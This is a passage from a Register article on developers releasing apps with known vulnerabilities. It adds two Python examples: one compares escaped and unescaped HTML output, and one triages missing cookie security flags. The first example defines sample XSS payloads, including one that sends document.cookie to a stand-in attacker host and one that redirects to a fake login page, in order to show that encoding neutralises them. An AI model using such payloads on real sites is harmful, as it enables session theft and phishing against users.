‘What are the odds someone will find and exploit this?’ Nice one — you just released an insecure app

By Davey Winder for The Register
Friday, June 25, 2021

Any developer under pressure to release new functionality may, Wright suggested, be under the false assumption that the worst that can happen for their customers is an annoying popup box. “In reality, this could lead to things such as an attacker being able to steal a victim’s session, being able to redirect victims to phishing pages, or even a user’s browser being controlled using tools such as Browser Exploitation Framework (BeEF).”
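The point above is that the sink which pops an "annoying" alert box is the same sink that ships a victim's cookies to an attacker or sends them to a phishing page; only the payload differs. The following added example (not code from the article, ImmuniWeb or anyone quoted) shows a reflected-output template in both its vulnerable and output-encoded forms and checks which payloads survive each. The payloads and the exfiltration host attacker.example are constructed for illustration.

```python
import html
import re

# Constructed payloads. attacker.example is a hypothetical host, not
# anything mentioned in the article.
PROBE_PAYLOAD = "<script>alert(1)</script>"
SESSION_THEFT_PAYLOAD = (
    "<img src=x onerror=\"fetch('https://attacker.example/c?'+"
    "encodeURIComponent(document.cookie))\">"
)
PHISH_REDIRECT_PAYLOAD = (
    "<script>location='https://attacker.example/login'</script>"
)

# A browser only parses a tag that starts with a literal '<'. Once that
# character is encoded to '&lt;' the whole payload is inert text.
_LIVE_TAG = re.compile(r"<(script|img|svg|iframe)\b", re.I)


def render_vulnerable(display_name: str) -> str:
    """Reflects user-controlled input into the HTML body with no encoding."""
    return f"<p>Welcome back, {display_name}</p>"


def render_safe(display_name: str) -> str:
    """Same template with output encoding for the HTML text context.

    quote=True also encodes ' and ", so the value is safe inside a
    quoted attribute as well as in element text.
    """
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}</p>"


def browser_would_execute(page: str) -> bool:
    """Rough stand-in for the HTML parser: True if an unescaped tag survives."""
    return _LIVE_TAG.search(page) is not None


def compare_payloads() -> dict:
    """For each payload: (executes in vulnerable page, executes in safe page)."""
    payloads = {
        "alert_probe": PROBE_PAYLOAD,
        "session_theft": SESSION_THEFT_PAYLOAD,
        "phish_redirect": PHISH_REDIRECT_PAYLOAD,
    }
    return {
        label: (
            browser_would_execute(render_vulnerable(p)),
            browser_would_execute(render_safe(p)),
        )
        for label, p in payloads.items()
    }


if __name__ == "__main__":
    for label, (vuln, safe) in compare_payloads().items():
        print(f"{label:15s} vulnerable={vuln} encoded={safe}")
```

The encoding fix is context-specific: `html.escape` is right for element text and quoted attributes, but a value placed inside a `<script>` block, a URL or an event handler needs the encoder for that context, and an HttpOnly flag on the session cookie blunts the cookie-theft payload without doing anything about the redirect.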

One of the dangers of taking that 81 per cent “knowingly” statistic at face value is that not all vulnerabilities are high risk or, indeed, exploitable in the production environment. This means, according to Ilia Kolochenko, founder of ImmuniWeb and a member of the Europol Data Protection Experts Network, that “releasing applications with vulnerabilities is not necessarily a highly dangerous practice”.

He explained how many automated security tools erroneously present various unexploitable warnings such as missing secure flags on cookies without any sensitive data and minor misconfigurations related to HTTP headers, for example, as high-risk vulnerabilities that developers readily ignore. “In many organisations, pressure from business is extreme, and developers are forced to go into production too early and fix vulnerable code in flight mode due to tough time constraints.”
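Kolochenko's example, a missing Secure flag on a cookie that carries nothing sensitive, is exactly the kind of finding that a scanner rates uniformly and a triager must rate in context. The following added example (not code from the article or from ImmuniWeb) parses Set-Cookie headers and rates a missing-flag finding by whether the cookie looks like a session bearer and whether the site is HTTPS-only with HSTS. The cookie-name heuristic, the severity scale and the sample headers are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

SEVERITY_RANK = {"none": 0, "info": 1, "low": 2, "medium": 3, "high": 4}

# Heuristic for names that usually identify a session or auth bearer.
# An assumption of this example; real triage uses the app's cookie inventory.
SENSITIVE_NAME = re.compile(r"sess|sid|token|auth|jwt|login", re.I)


@dataclass
class Cookie:
    name: str
    secure: bool
    httponly: bool
    samesite: Optional[str]


def parse_set_cookie(header: str) -> Cookie:
    """Parse the value of a Set-Cookie header (text after 'Set-Cookie:')."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for attr in parts[1:]:
        key, _, value = attr.partition("=")
        attrs[key.strip().lower()] = value.strip() or True  # flag attrs carry no value
    samesite = attrs.get("samesite")
    return Cookie(
        name=name,
        secure="secure" in attrs,
        httponly="httponly" in attrs,
        samesite=samesite if isinstance(samesite, str) else None,
    )


def triage(cookie: Cookie, https_only: bool, hsts: bool) -> Tuple[str, str]:
    """Rate a missing-cookie-flag finding in deployment context.

    https_only: the app is reachable over HTTPS only.
    hsts:       Strict-Transport-Security is sent, so after the first visit
                the browser will not issue plaintext requests to the host.
    Returns (severity, reason) for the worst issue found.
    """
    if not SENSITIVE_NAME.search(cookie.name):
        return ("info", f"{cookie.name}: no session or auth data; missing flags are hygiene only")

    findings = []
    if not cookie.secure:
        if https_only and hsts:
            findings.append(("low", "Secure missing, but HSTS keeps the cookie off plaintext after first visit"))
        else:
            findings.append(("high", "Secure missing: session cookie can be sent over HTTP and read on the wire"))
    if not cookie.httponly:
        findings.append(("medium", "HttpOnly missing: any XSS can read the session via document.cookie"))
    if cookie.samesite is None:
        findings.append(("low", "SameSite unset: browser default applies, verify CSRF defences"))
    if not findings:
        return ("none", f"{cookie.name}: Secure, HttpOnly and SameSite all set")
    return max(findings, key=lambda f: SEVERITY_RANK[f[0]])


# Constructed sample headers, as a scanner might collect them.
SAMPLE_HEADERS = [
    "sessionid=abc123; Path=/; HttpOnly",
    "_ga=GA1.2.123456789.1624600000; Path=/",
    "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
]


def triage_all(headers, https_only: bool, hsts: bool):
    """Return [(cookie name, severity)] for a batch of Set-Cookie values."""
    return [
        (c.name, triage(c, https_only, hsts)[0])
        for c in (parse_set_cookie(h) for h in headers)
    ]


if __name__ == "__main__":
    for name, sev in triage_all(SAMPLE_HEADERS, https_only=False, hsts=False):
        print(f"{name:10s} {sev}")
```

The "low" rather than "none" for a session cookie lacking Secure behind HSTS is deliberate: HSTS covers only hosts the browser has already seen the header from, and a sibling subdomain outside an includeSubDomains policy can still set or expose the cookie over HTTP.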
